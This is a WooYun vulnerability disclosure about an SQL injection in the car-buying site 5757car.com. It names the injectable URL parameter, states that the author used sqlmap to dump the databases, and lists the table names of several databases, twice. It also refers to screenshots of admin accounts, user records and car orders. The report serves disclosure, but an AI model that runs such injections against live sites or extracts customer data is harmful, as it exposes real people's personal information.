当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0161927
漏洞标题:
快车网存在SQL注入漏洞可影响用户敏感数据/可泄露所有客户购买汽车信息
相关厂商:
快车网
漏洞作者:
Can
提交时间:
2015-12-17 11:01
修复时间:
2016-01-28 17:10
公开时间:
2016-01-28 17:10
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
12
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-12-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

null

详细说明:

注入地址:

http://www.5757car.com/review.php?id=165


上sqlmap
直接脱裤 所有用户信息泄露 购买汽车订单泄露

Database: performance_schema                                                   
[52 tables]
+----------------------------------------------------+
| accounts                                           |
| cond_instances                                     |
| events_stages_current                              |
| events_stages_history                              |
| events_stages_history_long                         |
| events_stages_summary_by_account_by_event_name     |
| events_stages_summary_by_host_by_event_name        |
| events_stages_summary_by_thread_by_event_name      |
| events_stages_summary_by_user_by_event_name        |
| events_stages_summary_global_by_event_name         |
| events_statements_current                          |
| events_statements_history                          |
| events_statements_history_long                     |
| events_statements_summary_by_account_by_event_name |
| events_statements_summary_by_digest                |
| events_statements_summary_by_host_by_event_name    |
| events_statements_summary_by_thread_by_event_name  |
| events_statements_summary_by_user_by_event_name    |
| events_statements_summary_global_by_event_name     |
| events_waits_current                               |
| events_waits_history                               |
| events_waits_history_long                          |
| events_waits_summary_by_account_by_event_name      |
| events_waits_summary_by_host_by_event_name         |
| events_waits_summary_by_instance                   |
| events_waits_summary_by_thread_by_event_name       |
| events_waits_summary_by_user_by_event_name         |
| events_waits_summary_global_by_event_name          |
| file_instances                                     |
| file_summary_by_event_name                         |
| file_summary_by_instance                           |
| host_cache                                         |
| hosts                                              |
| mutex_instances                                    |
| objects_summary_global_by_type                     |
| performance_timers                                 |
| rwlock_instances                                   |
| session_account_connect_attrs                      |
| session_connect_attrs                              |
| setup_actors                                       |
| setup_consumers                                    |
| setup_instruments                                  |
| setup_objects                                      |
| setup_timers                                       |
| socket_instances                                   |
| socket_summary_by_event_name                       |
| socket_summary_by_instance                         |
| table_io_waits_summary_by_index_usage              |
| table_io_waits_summary_by_table                    |
| table_lock_waits_summary_by_table                  |
| threads                                            |
| users                                              |
+----------------------------------------------------+
Database: 5757car
[29 tables]
+----------------------------------------------------+
| ad                                                 |
| admin_group                                        |
| admin_group_map                                    |
| admin_group_permission                             |
| baoming                                            |
| baoming_copy                                       |
| bbs                                                |
| car_admin_log                                      |
| carbasicinfo                                       |
| carbrand                                           |
| cartype                                            |
| comefrom                                           |
| company                                            |
| customer                                           |
| huifang                                            |
| huiyuan                                            |
| image2                                             |
| joblog                                             |
| liuyan                                             |
| qccsb                                              |
| qccsb_new                                          |
| tuaninfo                                           |
| tuaninfo_copy                                      |
| tuaninfo_copy1                                     |
| tz                                                 |
| user_yg                                            |
| xwgg                                               |
| ygb                                                |
| ygb_copy                                           |
+----------------------------------------------------+
Database: 1717car
[30 tables]
+----------------------------------------------------+
| lee_activity                                       |
| lee_activity2                                      |
| lee_activity_copy                                  |
| lee_activity_copy2                                 |
| lee_activity_order                                 |
| lee_activity_order2                                |
| lee_article                                        |
| lee_carbasicinfo                                   |
| lee_carbrand                                       |
| lee_carotherinfo                                   |
| lee_cartype                                        |
| lee_category                                       |
| lee_commander                                      |
| lee_config                                         |
| lee_fragment                                       |
| lee_keywords                                       |
| lee_lang                                           |
| lee_link                                           |
| lee_model                                          |
| lee_navigation                                     |
| lee_online                                         |
| lee_purview                                        |
| lee_recommend                                      |
| lee_sessions                                       |
| lee_slide                                          |
| lee_tags                                           |
| lee_tpltags                                        |
| lee_type                                           |
| lee_user                                           |
| lee_usergroup                                      |
+----------------------------------------------------+
Database: system
[13 tables]
+----------------------------------------------------+
| comefrom                                           |
| lee_activity                                       |
| lee_activity_backup                                |
| lee_activity_cs                                    |
| lee_admin                                          |
| lee_baoming                                        |
| lee_baoming_20150407                               |
| lee_baoming_20150415                               |
| lee_baoming_20150507                               |
| lee_baoming_back                                   |
| lee_baoming_backup                                 |
| lee_baoming_bf                                     |
| lee_baomingxx                                      |
+----------------------------------------------------+
Database: mysql
[28 tables]
+----------------------------------------------------+
| user                                               |
| columns_priv                                       |
| db                                                 |
| event                                              |
| func                                               |
| general_log                                        |
| help_category                                      |
| help_keyword                                       |
| help_relation                                      |
| help_topic                                         |
| innodb_index_stats                                 |
| innodb_table_stats                                 |
| ndb_binlog_index                                   |
| plugin                                             |
| proc                                               |
| procs_priv                                         |
| proxies_priv                                       |
| servers                                            |
| slave_master_info                                  |
| slave_relay_log_info                               |
| slave_worker_info                                  |
| slow_log                                           |
| tables_priv                                        |
| time_zone                                          |
| time_zone_leap_second                              |
| time_zone_name                                     |
| time_zone_transition                               |
| time_zone_transition_type                          |
+----------------------------------------------------+
Database: information_schema
[59 tables]
+----------------------------------------------------+
| CHARACTER_SETS                                     |
| COLLATIONS                                         |
| COLLATION_CHARACTER_SET_APPLICABILITY              |
| COLUMNS                                            |
| COLUMN_PRIVILEGES                                  |
| ENGINES                                            |
| EVENTS                                             |
| FILES                                              |
| GLOBAL_STATUS                                      |
| GLOBAL_VARIABLES                                   |
| INNODB_BUFFER_PAGE                                 |
| INNODB_BUFFER_PAGE_LRU                             |
| INNODB_BUFFER_POOL_STATS                           |
| INNODB_CMP                                         |
| INNODB_CMPMEM                                      |
| INNODB_CMPMEM_RESET                                |
| INNODB_CMP_PER_INDEX                               |
| INNODB_CMP_PER_INDEX_RESET                         |
| INNODB_CMP_RESET                                   |
| INNODB_FT_BEING_DELETED                            |
| INNODB_FT_CONFIG                                   |
| INNODB_FT_DEFAULT_STOPWORD                         |
| INNODB_FT_DELETED                                  |
| INNODB_FT_INDEX_CACHE                              |
| INNODB_FT_INDEX_TABLE                              |
| INNODB_LOCKS                                       |
| INNODB_LOCK_WAITS                                  |
| INNODB_METRICS                                     |
| INNODB_SYS_COLUMNS                                 |
| INNODB_SYS_DATAFILES                               |
| INNODB_SYS_FIELDS                                  |
| INNODB_SYS_FOREIGN                                 |
| INNODB_SYS_FOREIGN_COLS                            |
| INNODB_SYS_INDEXES                                 |
| INNODB_SYS_TABLES                                  |
| INNODB_SYS_TABLESPACES                             |
| INNODB_SYS_TABLESTATS                              |
| INNODB_TRX                                         |
| KEY_COLUMN_USAGE                                   |
| OPTIMIZER_TRACE                                    |
| PARAMETERS                                         |
| PARTITIONS                                         |
| PLUGINS                                            |
| PROCESSLIST                                        |
| PROFILING                                          |
| REFERENTIAL_CONSTRAINTS                            |
| ROUTINES                                           |
| SCHEMATA                                           |
| SCHEMA_PRIVILEGES                                  |
| SESSION_STATUS                                     |
| SESSION_VARIABLES                                  |
| STATISTICS                                         |
| TABLES                                             |
| TABLESPACES                                        |
| TABLE_CONSTRAINTS                                  |
| TABLE_PRIVILEGES                                   |
| TRIGGERS                                           |
| USER_PRIVILEGES                                    |
| VIEWS                                              |
+----------------------------------------------------+


管理员账户

QQ截图20151216203907.png


用户信息

QQ截图20151216203933.png


汽车订单信息

QQ截图20151216204000.png


漏洞证明:

注入地址:

http://www.5757car.com/review.php?id=165


上sqlmap
直接脱裤 所有用户信息泄露 购买汽车订单泄露

Database: performance_schema                                                   
[52 tables]
+----------------------------------------------------+
| accounts                                           |
| cond_instances                                     |
| events_stages_current                              |
| events_stages_history                              |
| events_stages_history_long                         |
| events_stages_summary_by_account_by_event_name     |
| events_stages_summary_by_host_by_event_name        |
| events_stages_summary_by_thread_by_event_name      |
| events_stages_summary_by_user_by_event_name        |
| events_stages_summary_global_by_event_name         |
| events_statements_current                          |
| events_statements_history                          |
| events_statements_history_long                     |
| events_statements_summary_by_account_by_event_name |
| events_statements_summary_by_digest                |
| events_statements_summary_by_host_by_event_name    |
| events_statements_summary_by_thread_by_event_name  |
| events_statements_summary_by_user_by_event_name    |
| events_statements_summary_global_by_event_name     |
| events_waits_current                               |
| events_waits_history                               |
| events_waits_history_long                          |
| events_waits_summary_by_account_by_event_name      |
| events_waits_summary_by_host_by_event_name         |
| events_waits_summary_by_instance                   |
| events_waits_summary_by_thread_by_event_name       |
| events_waits_summary_by_user_by_event_name         |
| events_waits_summary_global_by_event_name          |
| file_instances                                     |
| file_summary_by_event_name                         |
| file_summary_by_instance                           |
| host_cache                                         |
| hosts                                              |
| mutex_instances                                    |
| objects_summary_global_by_type                     |
| performance_timers                                 |
| rwlock_instances                                   |
| session_account_connect_attrs                      |
| session_connect_attrs                              |
| setup_actors                                       |
| setup_consumers                                    |
| setup_instruments                                  |
| setup_objects                                      |
| setup_timers                                       |
| socket_instances                                   |
| socket_summary_by_event_name                       |
| socket_summary_by_instance                         |
| table_io_waits_summary_by_index_usage              |
| table_io_waits_summary_by_table                    |
| table_lock_waits_summary_by_table                  |
| threads                                            |
| users                                              |
+----------------------------------------------------+
Database: 5757car
[29 tables]
+----------------------------------------------------+
| ad                                                 |
| admin_group                                        |
| admin_group_map                                    |
| admin_group_permission                             |
| baoming                                            |
| baoming_copy                                       |
| bbs                                                |
| car_admin_log                                      |
| carbasicinfo                                       |
| carbrand                                           |
| cartype                                            |
| comefrom                                           |
| company                                            |
| customer                                           |
| huifang                                            |
| huiyuan                                            |
| image2                                             |
| joblog                                             |
| liuyan                                             |
| qccsb                                              |
| qccsb_new                                          |
| tuaninfo                                           |
| tuaninfo_copy                                      |
| tuaninfo_copy1                                     |
| tz                                                 |
| user_yg                                            |
| xwgg                                               |
| ygb                                                |
| ygb_copy                                           |
+----------------------------------------------------+
Database: 1717car
[30 tables]
+----------------------------------------------------+
| lee_activity                                       |
| lee_activity2                                      |
| lee_activity_copy                                  |
| lee_activity_copy2                                 |
| lee_activity_order                                 |
| lee_activity_order2                                |
| lee_article                                        |
| lee_carbasicinfo                                   |
| lee_carbrand                                       |
| lee_carotherinfo                                   |
| lee_cartype                                        |
| lee_category                                       |
| lee_commander                                      |
| lee_config                                         |
| lee_fragment                                       |
| lee_keywords                                       |
| lee_lang                                           |
| lee_link                                           |
| lee_model                                          |
| lee_navigation                                     |
| lee_online                                         |
| lee_purview                                        |
| lee_recommend                                      |
| lee_sessions                                       |
| lee_slide                                          |
| lee_tags                                           |
| lee_tpltags                                        |
| lee_type                                           |
| lee_user                                           |
| lee_usergroup                                      |
+----------------------------------------------------+
Database: system
[13 tables]
+----------------------------------------------------+
| comefrom                                           |
| lee_activity                                       |
| lee_activity_backup                                |
| lee_activity_cs                                    |
| lee_admin                                          |
| lee_baoming                                        |
| lee_baoming_20150407                               |
| lee_baoming_20150415                               |
| lee_baoming_20150507                               |
| lee_baoming_back                                   |
| lee_baoming_backup                                 |
| lee_baoming_bf                                     |
| lee_baomingxx                                      |
+----------------------------------------------------+
Database: mysql
[28 tables]
+----------------------------------------------------+
| user                                               |
| columns_priv                                       |
| db                                                 |
| event                                              |
| func                                               |
| general_log                                        |
| help_category                                      |
| help_keyword                                       |
| help_relation                                      |
| help_topic                                         |
| innodb_index_stats                                 |
| innodb_table_stats                                 |
| ndb_binlog_index                                   |
| plugin                                             |
| proc                                               |
| procs_priv                                         |
| proxies_priv                                       |
| servers                                            |
| slave_master_info                                  |
| slave_relay_log_info                               |
| slave_worker_info                                  |
| slow_log                                           |
| tables_priv                                        |
| time_zone                                          |
| time_zone_leap_second                              |
| time_zone_name                                     |
| time_zone_transition                               |
| time_zone_transition_type                          |
+----------------------------------------------------+
Database: information_schema
[59 tables]
+----------------------------------------------------+
| CHARACTER_SETS                                     |
| COLLATIONS                                         |
| COLLATION_CHARACTER_SET_APPLICABILITY              |
| COLUMNS                                            |
| COLUMN_PRIVILEGES                                  |
| ENGINES                                            |
| EVENTS                                             |
| FILES                                              |
| GLOBAL_STATUS                                      |
| GLOBAL_VARIABLES                                   |
| INNODB_BUFFER_PAGE                                 |
| INNODB_BUFFER_PAGE_LRU                             |
| INNODB_BUFFER_POOL_STATS                           |
| INNODB_CMP                                         |
| INNODB_CMPMEM                                      |
| INNODB_CMPMEM_RESET                                |
| INNODB_CMP_PER_INDEX                               |
| INNODB_CMP_PER_INDEX_RESET                         |
| INNODB_CMP_RESET                                   |
| INNODB_FT_BEING_DELETED                            |
| INNODB_FT_CONFIG                                   |
| INNODB_FT_DEFAULT_STOPWORD                         |
| INNODB_FT_DELETED                                  |
| INNODB_FT_INDEX_CACHE                              |
| INNODB_FT_INDEX_TABLE                              |
| INNODB_LOCKS                                       |
| INNODB_LOCK_WAITS                                  |
| INNODB_METRICS                                     |
| INNODB_SYS_COLUMNS                                 |
| INNODB_SYS_DATAFILES                               |
| INNODB_SYS_FIELDS                                  |
| INNODB_SYS_FOREIGN                                 |
| INNODB_SYS_FOREIGN_COLS                            |
| INNODB_SYS_INDEXES                                 |
| INNODB_SYS_TABLES                                  |
| INNODB_SYS_TABLESPACES                             |
| INNODB_SYS_TABLESTATS                              |
| INNODB_TRX                                         |
| KEY_COLUMN_USAGE                                   |
| OPTIMIZER_TRACE                                    |
| PARAMETERS                                         |
| PARTITIONS                                         |
| PLUGINS                                            |
| PROCESSLIST                                        |
| PROFILING                                          |
| REFERENTIAL_CONSTRAINTS                            |
| ROUTINES                                           |
| SCHEMATA                                           |
| SCHEMA_PRIVILEGES                                  |
| SESSION_STATUS                                     |
| SESSION_VARIABLES                                  |
| STATISTICS                                         |
| TABLES                                             |
| TABLESPACES                                        |
| TABLE_CONSTRAINTS                                  |
| TABLE_PRIVILEGES                                   |
| TRIGGERS                                           |
| USER_PRIVILEGES                                    |
| VIEWS                                              |
+----------------------------------------------------+


管理员账户

QQ截图20151216203907.png


用户信息

QQ截图20151216203933.png


汽车订单信息

QQ截图20151216204000.png


修复方案:

过滤参数

版权声明:转载请注明来源 Can@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝